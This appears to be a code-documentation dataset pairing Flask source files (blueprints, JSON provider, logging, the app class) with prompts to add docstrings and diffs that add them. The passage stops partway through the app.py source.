def wrapper(state: BlueprintSetupState) -> None:
if state.first_registration:
@@ -176,15 +246,59 @@ def make_setup_state(
self, app: App, options: dict[str, t.Any], first_registration: bool = False
) -> BlueprintSetupState:
+ """Creates an instance of :meth:`~flask.blueprints.BlueprintSetupState`
+ object that is later passed to the register callback functions.
+ Subclasses can override this to return a subclass of the setup state.
+ """
return BlueprintSetupState(self, app, options, first_registration)
@setupmethod
def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None:
+ """Register a :class:`~flask.Blueprint` on this blueprint. Keyword
+ arguments passed to this method will override the defaults set
+ on the blueprint.
+
+ .. versionchanged:: 2.0.1
+ The ``name`` option can be used to change the (pre-dotted)
+ name the blueprint is registered with. This allows the same
+ blueprint to be registered multiple times with unique names
+ for ``url_for``.
+
+ .. versionadded:: 2.0
+ """
if blueprint is self:
raise ValueError("Cannot register a blueprint on itself")
self._blueprints.append((blueprint, options))
def register(self, app: App, options: dict[str, t.Any]) -> None:
+ """Called by :meth:`Flask.register_blueprint` to register all
+ views and callbacks registered on the blueprint with the
+ application. Creates a :class:`.BlueprintSetupState` and calls
+ each :meth:`record` callback with it.
+
+ :param app: The application this blueprint is being registered
+ with.
+ :param options: Keyword arguments forwarded from
+ :meth:`~Flask.register_blueprint`.
+
+ .. versionchanged:: 2.3
+ Nested blueprints now correctly apply subdomains.
+
+ .. versionchanged:: 2.1
+ Registering the same blueprint with the same name multiple
+ times is an error.
+
+ .. versionchanged:: 2.0.1
+ Nested blueprints are registered with their dotted name.
+ This allows different blueprints with the same name to be
+ nested at different locations.
+
+ .. versionchanged:: 2.0.1
+ The ``name`` option can be used to change the (pre-dotted)
+ name the blueprint is registered with. This allows the same
+ blueprint to be registered multiple times with unique names
+ for ``url_for``.
+ """
name_prefix = options.get("name_prefix", "")
self_name = options.get("name", self.name)
name = f"{name_prefix}.{self_name}".lstrip(".")
@@ -304,6 +418,12 @@ provide_automatic_options: bool | None = None,
**options: t.Any,
) -> None:
+ """Register a URL rule with the blueprint. See :meth:`.Flask.add_url_rule` for
+ full documentation.
+
+ The URL rule is prefixed with the blueprint's URL prefix. The endpoint name,
+ used with :func:`url_for`, is prefixed with the blueprint's name.
+ """
if endpoint and "." in endpoint:
raise ValueError("'endpoint' may not contain a dot '.' character.")
@@ -330,6 +450,18 @@ def app_template_filter(
self, name: T_template_filter | str | None = None
) -> T_template_filter | t.Callable[[T_template_filter], T_template_filter]:
+ """Decorate a function to register it as a custom Jinja filter. The name
+ is optional. The decorator may be used without parentheses.
+
+ The :meth:`add_app_template_filter` method may be used to register a
+ function later rather than decorating.
+
+ The filter is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.template_filter`.
+
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+ """
if callable(name):
self.add_app_template_filter(name)
return name
@@ -344,6 +476,18 @@ def add_app_template_filter(
self, f: ft.TemplateFilterCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja filter.
+
+ The :meth:`app_template_filter` decorator can be used to register a
+ function by decorating instead.
+
+ The filter is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.add_template_filter`.
+
+ :param f: The function to register.
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+ """
def register_template_filter(state: BlueprintSetupState) -> None:
state.app.add_template_filter(f, name=name)
@@ -360,6 +504,20 @@ def app_template_test(
self, name: T_template_test | str | None = None
) -> T_template_test | t.Callable[[T_template_test], T_template_test]:
+ """Decorate a function to register it as a custom Jinja test. The name
+ is optional. The decorator may be used without parentheses.
+
+ The :meth:`add_app_template_test` method may be used to register a
+ function later rather than decorating.
+
+ The test is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.template_test`.
+
+ :param name: The name to register the filter as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
if callable(name):
self.add_app_template_test(name)
return name
@@ -374,6 +532,20 @@ def add_app_template_test(
self, f: ft.TemplateTestCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja test.
+
+ The :meth:`app_template_test` decorator can be used to register a
+ function by decorating instead.
+
+ The test is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.add_template_test`.
+
+ :param f: The function to register.
+ :param name: The name to register the test as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
def register_template_test(state: BlueprintSetupState) -> None:
state.app.add_template_test(f, name=name)
@@ -390,6 +562,20 @@ def app_template_global(
self, name: T_template_global | str | None = None
) -> T_template_global | t.Callable[[T_template_global], T_template_global]:
+ """Decorate a function to register it as a custom Jinja global. The name
+ is optional. The decorator may be used without parentheses.
+
+ The :meth:`add_app_template_global` method may be used to register a
+ function later rather than decorating.
+
+ The global is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.template_global`.
+
+ :param name: The name to register the global as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
if callable(name):
self.add_app_template_global(name)
return name
@@ -404,6 +590,20 @@ def add_app_template_global(
self, f: ft.TemplateGlobalCallable, name: str | None = None
) -> None:
+ """Register a function to use as a custom Jinja global.
+
+ The :meth:`app_template_global` decorator can be used to register a function
+ by decorating instead.
+
+ The global is available in all templates, not only those under this
+ blueprint. Equivalent to :meth:`.Flask.add_template_global`.
+
+ :param f: The function to register.
+ :param name: The name to register the global as. If not given, uses the
+ function's name.
+
+ .. versionadded:: 0.10
+ """
def register_template_global(state: BlueprintSetupState) -> None:
state.app.add_template_global(f, name=name)
@@ -412,6 +612,9 @@
@setupmethod
def before_app_request(self, f: T_before_request) -> T_before_request:
+ """Like :meth:`before_request`, but before every request, not only those handled
+ by the blueprint. Equivalent to :meth:`.Flask.before_request`.
+ """
self.record_once(
lambda s: s.app.before_request_funcs.setdefault(None, []).append(f)
)
@@ -419,6 +622,9 @@
@setupmethod
def after_app_request(self, f: T_after_request) -> T_after_request:
+ """Like :meth:`after_request`, but after every request, not only those handled
+ by the blueprint. Equivalent to :meth:`.Flask.after_request`.
+ """
self.record_once(
lambda s: s.app.after_request_funcs.setdefault(None, []).append(f)
)
@@ -426,6 +632,9 @@
@setupmethod
def teardown_app_request(self, f: T_teardown) -> T_teardown:
+ """Like :meth:`teardown_request`, but after every request, not only those
+ handled by the blueprint. Equivalent to :meth:`.Flask.teardown_request`.
+ """
self.record_once(
lambda s: s.app.teardown_request_funcs.setdefault(None, []).append(f)
)
@@ -435,6 +644,9 @@ def app_context_processor(
self, f: T_template_context_processor
) -> T_template_context_processor:
+ """Like :meth:`context_processor`, but for templates rendered by every view, not
+ only by the blueprint. Equivalent to :meth:`.Flask.context_processor`.
+ """
self.record_once(
lambda s: s.app.template_context_processors.setdefault(None, []).append(f)
)
@@ -444,6 +656,9 @@ def app_errorhandler(
self, code: type[Exception] | int
) -> t.Callable[[T_error_handler], T_error_handler]:
+ """Like :meth:`errorhandler`, but for every request, not only those handled by
+ the blueprint. Equivalent to :meth:`.Flask.errorhandler`.
+ """
def decorator(f: T_error_handler) -> T_error_handler:
def from_blueprint(state: BlueprintSetupState) -> None:
@@ -458,6 +673,9 @@ def app_url_value_preprocessor(
self, f: T_url_value_preprocessor
) -> T_url_value_preprocessor:
+ """Like :meth:`url_value_preprocessor`, but for every request, not only those
+ handled by the blueprint. Equivalent to :meth:`.Flask.url_value_preprocessor`.
+ """
self.record_once(
lambda s: s.app.url_value_preprocessors.setdefault(None, []).append(f)
)
@@ -465,7 +683,10 @@
@setupmethod
def app_url_defaults(self, f: T_url_defaults) -> T_url_defaults:
+ """Like :meth:`url_defaults`, but for every request, not only those handled by
+ the blueprint. Equivalent to :meth:`.Flask.url_defaults`.
+ """
self.record_once(
lambda s: s.app.url_default_functions.setdefault(None, []).append(f)
)
- return f+ return f
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/sansio/blueprints.py |
Add docstrings to make code maintainable | from __future__ import annotations
import dataclasses
import decimal
import json
import typing as t
import uuid
import weakref
from datetime import date
from werkzeug.http import http_date
if t.TYPE_CHECKING: # pragma: no cover
from werkzeug.sansio.response import Response
from ..sansio.app import App
class JSONProvider:
def __init__(self, app: App) -> None:
self._app: App = weakref.proxy(app)
def dumps(self, obj: t.Any, **kwargs: t.Any) -> str:
raise NotImplementedError
def dump(self, obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None:
fp.write(self.dumps(obj, **kwargs))
def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any:
raise NotImplementedError
def load(self, fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any:
return self.loads(fp.read(), **kwargs)
def _prepare_response_obj(
self, args: tuple[t.Any, ...], kwargs: dict[str, t.Any]
) -> t.Any:
if args and kwargs:
raise TypeError("app.json.response() takes either args or kwargs, not both")
if not args and not kwargs:
return None
if len(args) == 1:
return args[0]
return args or kwargs
def response(self, *args: t.Any, **kwargs: t.Any) -> Response:
obj = self._prepare_response_obj(args, kwargs)
return self._app.response_class(self.dumps(obj), mimetype="application/json")
def _default(o: t.Any) -> t.Any:
if isinstance(o, date):
return http_date(o)
if isinstance(o, (decimal.Decimal, uuid.UUID)):
return str(o)
if dataclasses and dataclasses.is_dataclass(o):
return dataclasses.asdict(o) # type: ignore[arg-type]
if hasattr(o, "__html__"):
return str(o.__html__())
raise TypeError(f"Object of type {type(o).__name__} is not JSON serializable")
class DefaultJSONProvider(JSONProvider):
default: t.Callable[[t.Any], t.Any] = staticmethod(_default)
"""Apply this function to any object that :meth:`json.dumps` does
not know how to serialize. It should return a valid JSON type or
raise a ``TypeError``.
"""
ensure_ascii = True
"""Replace non-ASCII characters with escape sequences. This may be
more compatible with some clients, but can be disabled for better
performance and size.
"""
sort_keys = True
"""Sort the keys in any serialized dicts. This may be useful for
some caching situations, but can be disabled for better performance.
When enabled, keys must all be strings, they are not converted
before sorting.
"""
compact: bool | None = None
"""If ``True``, or ``None`` out of debug mode, the :meth:`response`
output will not add indentation, newlines, or spaces. If ``False``,
or ``None`` in debug mode, it will use a non-compact representation.
"""
mimetype = "application/json"
"""The mimetype set in :meth:`response`."""
def dumps(self, obj: t.Any, **kwargs: t.Any) -> str:
kwargs.setdefault("default", self.default)
kwargs.setdefault("ensure_ascii", self.ensure_ascii)
kwargs.setdefault("sort_keys", self.sort_keys)
return json.dumps(obj, **kwargs)
def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any:
return json.loads(s, **kwargs)
def response(self, *args: t.Any, **kwargs: t.Any) -> Response:
obj = self._prepare_response_obj(args, kwargs)
dump_args: dict[str, t.Any] = {}
if (self.compact is None and self._app.debug) or self.compact is False:
dump_args.setdefault("indent", 2)
else:
dump_args.setdefault("separators", (",", ":"))
return self._app.response_class(
f"{self.dumps(obj, **dump_args)}\n", mimetype=self.mimetype
) | --- +++ @@ -17,20 +17,59 @@
class JSONProvider:
+ """A standard set of JSON operations for an application. Subclasses
+ of this can be used to customize JSON behavior or use different
+ JSON libraries.
+
+ To implement a provider for a specific library, subclass this base
+ class and implement at least :meth:`dumps` and :meth:`loads`. All
+ other methods have default implementations.
+
+ To use a different provider, either subclass ``Flask`` and set
+ :attr:`~flask.Flask.json_provider_class` to a provider class, or set
+ :attr:`app.json <flask.Flask.json>` to an instance of the class.
+
+ :param app: An application instance. This will be stored as a
+ :class:`weakref.proxy` on the :attr:`_app` attribute.
+
+ .. versionadded:: 2.2
+ """
def __init__(self, app: App) -> None:
self._app: App = weakref.proxy(app)
def dumps(self, obj: t.Any, **kwargs: t.Any) -> str:
+ """Serialize data as JSON.
+
+ :param obj: The data to serialize.
+ :param kwargs: May be passed to the underlying JSON library.
+ """
raise NotImplementedError
def dump(self, obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None:
+ """Serialize data as JSON and write to a file.
+
+ :param obj: The data to serialize.
+ :param fp: A file opened for writing text. Should use the UTF-8
+ encoding to be valid JSON.
+ :param kwargs: May be passed to the underlying JSON library.
+ """
fp.write(self.dumps(obj, **kwargs))
def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON.
+
+ :param s: Text or UTF-8 bytes.
+ :param kwargs: May be passed to the underlying JSON library.
+ """
raise NotImplementedError
def load(self, fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON read from a file.
+
+ :param fp: A file opened for reading text or UTF-8 bytes.
+ :param kwargs: May be passed to the underlying JSON library.
+ """
return self.loads(fp.read(), **kwargs)
def _prepare_response_obj(
@@ -48,6 +87,20 @@ return args or kwargs
def response(self, *args: t.Any, **kwargs: t.Any) -> Response:
+ """Serialize the given arguments as JSON, and return a
+ :class:`~flask.Response` object with the ``application/json``
+ mimetype.
+
+ The :func:`~flask.json.jsonify` function calls this method for
+ the current application.
+
+ Either positional or keyword arguments can be given, not both.
+ If no arguments are given, ``None`` is serialized.
+
+ :param args: A single value to serialize, or multiple values to
+ treat as a list to serialize.
+ :param kwargs: Treat as a dict to serialize.
+ """
obj = self._prepare_response_obj(args, kwargs)
return self._app.response_class(self.dumps(obj), mimetype="application/json")
@@ -69,6 +122,18 @@
class DefaultJSONProvider(JSONProvider):
+ """Provide JSON operations using Python's built-in :mod:`json`
+ library. Serializes the following additional data types:
+
+ - :class:`datetime.datetime` and :class:`datetime.date` are
+ serialized to :rfc:`822` strings. This is the same as the HTTP
+ date format.
+ - :class:`uuid.UUID` is serialized to a string.
+ - :class:`dataclasses.dataclass` is passed to
+ :func:`dataclasses.asdict`.
+ - :class:`~markupsafe.Markup` (or any object with a ``__html__``
+ method) will call the ``__html__`` method to get a string.
+ """
default: t.Callable[[t.Any], t.Any] = staticmethod(_default)
"""Apply this function to any object that :meth:`json.dumps` does
@@ -99,15 +164,44 @@ """The mimetype set in :meth:`response`."""
def dumps(self, obj: t.Any, **kwargs: t.Any) -> str:
+ """Serialize data as JSON to a string.
+
+ Keyword arguments are passed to :func:`json.dumps`. Sets some
+ parameter defaults from the :attr:`default`,
+ :attr:`ensure_ascii`, and :attr:`sort_keys` attributes.
+
+ :param obj: The data to serialize.
+ :param kwargs: Passed to :func:`json.dumps`.
+ """
kwargs.setdefault("default", self.default)
kwargs.setdefault("ensure_ascii", self.ensure_ascii)
kwargs.setdefault("sort_keys", self.sort_keys)
return json.dumps(obj, **kwargs)
def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON from a string or bytes.
+
+ :param s: Text or UTF-8 bytes.
+ :param kwargs: Passed to :func:`json.loads`.
+ """
return json.loads(s, **kwargs)
def response(self, *args: t.Any, **kwargs: t.Any) -> Response:
+ """Serialize the given arguments as JSON, and return a
+ :class:`~flask.Response` object with it. The response mimetype
+ will be "application/json" and can be changed with
+ :attr:`mimetype`.
+
+ If :attr:`compact` is ``False`` or debug mode is enabled, the
+ output will be formatted to be easier to read.
+
+ Either positional or keyword arguments can be given, not both.
+ If no arguments are given, ``None`` is serialized.
+
+ :param args: A single value to serialize, or multiple values to
+ treat as a list to serialize.
+ :param kwargs: Treat as a dict to serialize.
+ """
obj = self._prepare_response_obj(args, kwargs)
dump_args: dict[str, t.Any] = {}
@@ -118,4 +212,4 @@
return self._app.response_class(
f"{self.dumps(obj, **dump_args)}\n", mimetype=self.mimetype
- )+ )
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/json/provider.py |
Replace inline comments with docstrings | from __future__ import annotations
import logging
import sys
import typing as t
from werkzeug.local import LocalProxy
from .globals import request
if t.TYPE_CHECKING: # pragma: no cover
from .sansio.app import App
@LocalProxy
def wsgi_errors_stream() -> t.TextIO:
if request:
return request.environ["wsgi.errors"] # type: ignore[no-any-return]
return sys.stderr
def has_level_handler(logger: logging.Logger) -> bool:
level = logger.getEffectiveLevel()
current = logger
while current:
if any(handler.level <= level for handler in current.handlers):
return True
if not current.propagate:
break
current = current.parent # type: ignore
return False
#: Log messages to :func:`~flask.logging.wsgi_errors_stream` with the format
#: ``[%(asctime)s] %(levelname)s in %(module)s: %(message)s``.
default_handler = logging.StreamHandler(wsgi_errors_stream) # type: ignore
default_handler.setFormatter(
logging.Formatter("[%(asctime)s] %(levelname)s in %(module)s: %(message)s")
)
def create_logger(app: App) -> logging.Logger:
logger = logging.getLogger(app.name)
if app.debug and not logger.level:
logger.setLevel(logging.DEBUG)
if not has_level_handler(logger):
logger.addHandler(default_handler)
return logger | --- +++ @@ -14,6 +14,14 @@
@LocalProxy
def wsgi_errors_stream() -> t.TextIO:
+ """Find the most appropriate error stream for the application. If a request
+ is active, log to ``wsgi.errors``, otherwise use ``sys.stderr``.
+
+ If you configure your own :class:`logging.StreamHandler`, you may want to
+ use this for the stream. If you are using file or dict configuration and
+ can't import this directly, you can refer to it as
+ ``ext://flask.logging.wsgi_errors_stream``.
+ """
if request:
return request.environ["wsgi.errors"] # type: ignore[no-any-return]
@@ -21,6 +29,9 @@
def has_level_handler(logger: logging.Logger) -> bool:
+ """Check if there is a handler in the logging chain that will handle the
+ given logger's :meth:`effective level <~logging.Logger.getEffectiveLevel>`.
+ """
level = logger.getEffectiveLevel()
current = logger
@@ -45,6 +56,18 @@
def create_logger(app: App) -> logging.Logger:
+ """Get the Flask app's logger and configure it if needed.
+
+ The logger name will be the same as
+ :attr:`app.import_name <flask.Flask.name>`.
+
+ When :attr:`~flask.Flask.debug` is enabled, set the logger level to
+ :data:`logging.DEBUG` if it is not set.
+
+ If there is no handler for the logger's effective level, add a
+ :class:`~logging.StreamHandler` for
+ :func:`~flask.logging.wsgi_errors_stream` with a basic format.
+ """
logger = logging.getLogger(app.name)
if app.debug and not logger.level:
@@ -53,4 +76,4 @@ if not has_level_handler(logger):
logger.addHandler(default_handler)
- return logger+ return logger
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/logging.py |
Create Google-style docstrings for my code | from __future__ import annotations
import collections.abc as cabc
import inspect
import os
import sys
import typing as t
import weakref
from datetime import timedelta
from functools import update_wrapper
from inspect import iscoroutinefunction
from itertools import chain
from types import TracebackType
from urllib.parse import quote as _url_quote
import click
from werkzeug.datastructures import Headers
from werkzeug.datastructures import ImmutableDict
from werkzeug.exceptions import BadRequestKeyError
from werkzeug.exceptions import HTTPException
from werkzeug.exceptions import InternalServerError
from werkzeug.routing import BuildError
from werkzeug.routing import MapAdapter
from werkzeug.routing import RequestRedirect
from werkzeug.routing import RoutingException
from werkzeug.routing import Rule
from werkzeug.serving import is_running_from_reloader
from werkzeug.wrappers import Response as BaseResponse
from werkzeug.wsgi import get_host
from . import cli
from . import typing as ft
from .ctx import AppContext
from .globals import _cv_app
from .globals import app_ctx
from .globals import g
from .globals import request
from .globals import session
from .helpers import _CollectErrors
from .helpers import get_debug_flag
from .helpers import get_flashed_messages
from .helpers import get_load_dotenv
from .helpers import send_from_directory
from .sansio.app import App
from .sessions import SecureCookieSessionInterface
from .sessions import SessionInterface
from .signals import appcontext_tearing_down
from .signals import got_request_exception
from .signals import request_finished
from .signals import request_started
from .signals import request_tearing_down
from .templating import Environment
from .wrappers import Request
from .wrappers import Response
if t.TYPE_CHECKING: # pragma: no cover
from _typeshed.wsgi import StartResponse
from _typeshed.wsgi import WSGIEnvironment
from .testing import FlaskClient
from .testing import FlaskCliRunner
from .typing import HeadersValue
T_shell_context_processor = t.TypeVar(
"T_shell_context_processor", bound=ft.ShellContextProcessorCallable
)
T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable)
T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable)
T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable)
T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable)
def _make_timedelta(value: timedelta | int | None) -> timedelta | None:
if value is None or isinstance(value, timedelta):
return value
return timedelta(seconds=value)
F = t.TypeVar("F", bound=t.Callable[..., t.Any])
# Other methods may call the overridden method with the new ctx arg. Remove it
# and call the method with the remaining args.
def remove_ctx(f: F) -> F:
def wrapper(self: Flask, *args: t.Any, **kwargs: t.Any) -> t.Any:
if args and isinstance(args[0], AppContext):
args = args[1:]
return f(self, *args, **kwargs)
return update_wrapper(wrapper, f) # type: ignore[return-value]
# The overridden method may call super().base_method without the new ctx arg.
# Add it to the args for the call.
def add_ctx(f: F) -> F:
def wrapper(self: Flask, *args: t.Any, **kwargs: t.Any) -> t.Any:
if not args:
args = (app_ctx._get_current_object(),)
elif not isinstance(args[0], AppContext):
args = (app_ctx._get_current_object(), *args)
return f(self, *args, **kwargs)
return update_wrapper(wrapper, f) # type: ignore[return-value]
class Flask(App):
default_config = ImmutableDict(
{
"DEBUG": None,
"TESTING": False,
"PROPAGATE_EXCEPTIONS": None,
"SECRET_KEY": None,
"SECRET_KEY_FALLBACKS": None,
"PERMANENT_SESSION_LIFETIME": timedelta(days=31),
"USE_X_SENDFILE": False,
"TRUSTED_HOSTS": None,
"SERVER_NAME": None,
"APPLICATION_ROOT": "/",
"SESSION_COOKIE_NAME": "session",
"SESSION_COOKIE_DOMAIN": None,
"SESSION_COOKIE_PATH": None,
"SESSION_COOKIE_HTTPONLY": True,
"SESSION_COOKIE_SECURE": False,
"SESSION_COOKIE_PARTITIONED": False,
"SESSION_COOKIE_SAMESITE": None,
"SESSION_REFRESH_EACH_REQUEST": True,
"MAX_CONTENT_LENGTH": None,
"MAX_FORM_MEMORY_SIZE": 500_000,
"MAX_FORM_PARTS": 1_000,
"SEND_FILE_MAX_AGE_DEFAULT": None,
"TRAP_BAD_REQUEST_ERRORS": None,
"TRAP_HTTP_EXCEPTIONS": False,
"EXPLAIN_TEMPLATE_LOADING": False,
"PREFERRED_URL_SCHEME": "http",
"TEMPLATES_AUTO_RELOAD": None,
"MAX_COOKIE_SIZE": 4093,
"PROVIDE_AUTOMATIC_OPTIONS": True,
}
)
#: The class that is used for request objects. See :class:`~flask.Request`
#: for more information.
request_class: type[Request] = Request
#: The class that is used for response objects. See
#: :class:`~flask.Response` for more information.
response_class: type[Response] = Response
#: the session interface to use. By default an instance of
#: :class:`~flask.sessions.SecureCookieSessionInterface` is used here.
#:
#: .. versionadded:: 0.8
session_interface: SessionInterface = SecureCookieSessionInterface()
def __init_subclass__(cls, **kwargs: t.Any) -> None:
import warnings
# These method signatures were updated to take a ctx param. Detect
# overridden methods in subclasses that still have the old signature.
# Show a deprecation warning and wrap to call with correct args.
for method in (
cls.handle_http_exception,
cls.handle_user_exception,
cls.handle_exception,
cls.log_exception,
cls.dispatch_request,
cls.full_dispatch_request,
cls.finalize_request,
cls.make_default_options_response,
cls.preprocess_request,
cls.process_response,
cls.do_teardown_request,
cls.do_teardown_appcontext,
):
base_method = getattr(Flask, method.__name__)
if method is base_method:
# not overridden
continue
# get the second parameter (first is self)
iter_params = iter(inspect.signature(method).parameters.values())
next(iter_params)
param = next(iter_params, None)
# must have second parameter named ctx or annotated AppContext
if param is None or not (
# no annotation, match name
(param.annotation is inspect.Parameter.empty and param.name == "ctx")
or (
# string annotation, access path ends with AppContext
isinstance(param.annotation, str)
and param.annotation.rpartition(".")[2] == "AppContext"
)
or (
# class annotation
inspect.isclass(param.annotation)
and issubclass(param.annotation, AppContext)
)
):
warnings.warn(
f"The '{method.__name__}' method now takes 'ctx: AppContext'"
" as the first parameter. The old signature is deprecated"
" and will not be supported in Flask 4.0.",
DeprecationWarning,
stacklevel=2,
)
setattr(cls, method.__name__, remove_ctx(method))
setattr(Flask, method.__name__, add_ctx(base_method))
def __init__(
self,
import_name: str,
static_url_path: str | None = None,
static_folder: str | os.PathLike[str] | None = "static",
static_host: str | None = None,
host_matching: bool = False,
subdomain_matching: bool = False,
template_folder: str | os.PathLike[str] | None = "templates",
instance_path: str | None = None,
instance_relative_config: bool = False,
root_path: str | None = None,
):
super().__init__(
import_name=import_name,
static_url_path=static_url_path,
static_folder=static_folder,
static_host=static_host,
host_matching=host_matching,
subdomain_matching=subdomain_matching,
template_folder=template_folder,
instance_path=instance_path,
instance_relative_config=instance_relative_config,
root_path=root_path,
)
#: The Click command group for registering CLI commands for this
#: object. The commands are available from the ``flask`` command
#: once the application has been discovered and blueprints have
#: been registered.
self.cli = cli.AppGroup()
# Set the name of the Click group in case someone wants to add
# the app's commands to another CLI tool.
self.cli.name = self.name
# Add a static route using the provided static_url_path, static_host,
# and static_folder if there is a configured static_folder.
# Note we do this without checking if static_folder exists.
# For one, it might be created while the server is running (e.g. during
# development). Also, Google App Engine stores static files somewhere
if self.has_static_folder:
assert bool(static_host) == host_matching, (
"Invalid static_host/host_matching combination"
)
# Use a weakref to avoid creating a reference cycle between the app
# and the view function (see #3761).
self_ref = weakref.ref(self)
self.add_url_rule(
f"{self.static_url_path}/<path:filename>",
endpoint="static",
host=static_host,
view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore
)
def get_send_file_max_age(self, filename: str | None) -> int | None:
value = self.config["SEND_FILE_MAX_AGE_DEFAULT"]
if value is None:
return None
if isinstance(value, timedelta):
return int(value.total_seconds())
return value # type: ignore[no-any-return]
def send_static_file(self, filename: str) -> Response:
if not self.has_static_folder:
raise RuntimeError("'static_folder' must be set to serve static_files.")
# send_file only knows to call get_send_file_max_age on the app,
# call it here so it works for blueprints too.
max_age = self.get_send_file_max_age(filename)
return send_from_directory(
t.cast(str, self.static_folder), filename, max_age=max_age
)
def open_resource(
self, resource: str, mode: str = "rb", encoding: str | None = None
) -> t.IO[t.AnyStr]:
if mode not in {"r", "rt", "rb"}:
raise ValueError("Resources can only be opened for reading.")
path = os.path.join(self.root_path, resource)
if mode == "rb":
return open(path, mode) # pyright: ignore
return open(path, mode, encoding=encoding)
def open_instance_resource(
self, resource: str, mode: str = "rb", encoding: str | None = "utf-8"
) -> t.IO[t.AnyStr]:
path = os.path.join(self.instance_path, resource)
if "b" in mode:
return open(path, mode)
return open(path, mode, encoding=encoding)
def create_jinja_environment(self) -> Environment:
options = dict(self.jinja_options)
if "autoescape" not in options:
options["autoescape"] = self.select_jinja_autoescape
if "auto_reload" not in options:
auto_reload = self.config["TEMPLATES_AUTO_RELOAD"]
if auto_reload is None:
auto_reload = self.debug
options["auto_reload"] = auto_reload
rv = self.jinja_environment(self, **options)
rv.globals.update(
url_for=self.url_for,
get_flashed_messages=get_flashed_messages,
config=self.config,
# request, session and g are normally added with the
# context processor for efficiency reasons but for imported
# templates we also want the proxies in there.
request=request,
session=session,
g=g,
)
rv.policies["json.dumps_function"] = self.json.dumps
return rv
def create_url_adapter(self, request: Request | None) -> MapAdapter | None:
if request is not None:
if (trusted_hosts := self.config["TRUSTED_HOSTS"]) is not None:
request.trusted_hosts = trusted_hosts
# Check trusted_hosts here until bind_to_environ does.
request.host = get_host(request.environ, request.trusted_hosts) # pyright: ignore
subdomain = None
server_name = self.config["SERVER_NAME"]
if self.url_map.host_matching:
# Don't pass SERVER_NAME, otherwise it's used and the actual
# host is ignored, which breaks host matching.
server_name = None
elif not self.subdomain_matching:
# Werkzeug doesn't implement subdomain matching yet. Until then,
# disable it by forcing the current subdomain to the default, or
# the empty string.
subdomain = self.url_map.default_subdomain or ""
return self.url_map.bind_to_environ(
request.environ, server_name=server_name, subdomain=subdomain
)
# Need at least SERVER_NAME to match/build outside a request.
if self.config["SERVER_NAME"] is not None:
return self.url_map.bind(
self.config["SERVER_NAME"],
script_name=self.config["APPLICATION_ROOT"],
url_scheme=self.config["PREFERRED_URL_SCHEME"],
)
return None
def raise_routing_exception(self, request: Request) -> t.NoReturn:
if (
not self.debug
or not isinstance(request.routing_exception, RequestRedirect)
or request.routing_exception.code in {307, 308}
or request.method in {"GET", "HEAD", "OPTIONS"}
):
raise request.routing_exception # type: ignore[misc]
from .debughelpers import FormDataRoutingRedirect
raise FormDataRoutingRedirect(request)
def update_template_context(
self, ctx: AppContext, context: dict[str, t.Any]
) -> None:
names: t.Iterable[str | None] = (None,)
# A template may be rendered outside a request context.
if ctx.has_request:
names = chain(names, reversed(ctx.request.blueprints))
# The values passed to render_template take precedence. Keep a
# copy to re-apply after all context functions.
orig_ctx = context.copy()
for name in names:
if name in self.template_context_processors:
for func in self.template_context_processors[name]:
context.update(self.ensure_sync(func)())
context.update(orig_ctx)
def make_shell_context(self) -> dict[str, t.Any]:
rv = {"app": self, "g": g}
for processor in self.shell_context_processors:
rv.update(processor())
return rv
def run(
self,
host: str | None = None,
port: int | None = None,
debug: bool | None = None,
load_dotenv: bool = True,
**options: t.Any,
) -> None:
# Ignore this call so that it doesn't start another server if
# the 'flask run' command is used.
if os.environ.get("FLASK_RUN_FROM_CLI") == "true":
if not is_running_from_reloader():
click.secho(
" * Ignoring a call to 'app.run()' that would block"
" the current 'flask' CLI command.\n"
" Only call 'app.run()' in an 'if __name__ =="
' "__main__"\' guard.',
fg="red",
)
return
if get_load_dotenv(load_dotenv):
cli.load_dotenv()
# if set, env var overrides existing value
if "FLASK_DEBUG" in os.environ:
self.debug = get_debug_flag()
# debug passed to method overrides all other sources
if debug is not None:
self.debug = bool(debug)
server_name = self.config.get("SERVER_NAME")
sn_host = sn_port = None
if server_name:
sn_host, _, sn_port = server_name.partition(":")
if not host:
if sn_host:
host = sn_host
else:
host = "127.0.0.1"
if port or port == 0:
port = int(port)
elif sn_port:
port = int(sn_port)
else:
port = 5000
options.setdefault("use_reloader", self.debug)
options.setdefault("use_debugger", self.debug)
options.setdefault("threaded", True)
cli.show_server_banner(self.debug, self.name)
from werkzeug.serving import run_simple
try:
run_simple(t.cast(str, host), port, self, **options)
finally:
# reset the first request information if the development server
# reset normally. This makes it possible to restart the server
# without reloader and that stuff from an interactive shell.
self._got_first_request = False
def test_client(self, use_cookies: bool = True, **kwargs: t.Any) -> FlaskClient:
cls = self.test_client_class
if cls is None:
from .testing import FlaskClient as cls
return cls( # type: ignore
self, self.response_class, use_cookies=use_cookies, **kwargs
)
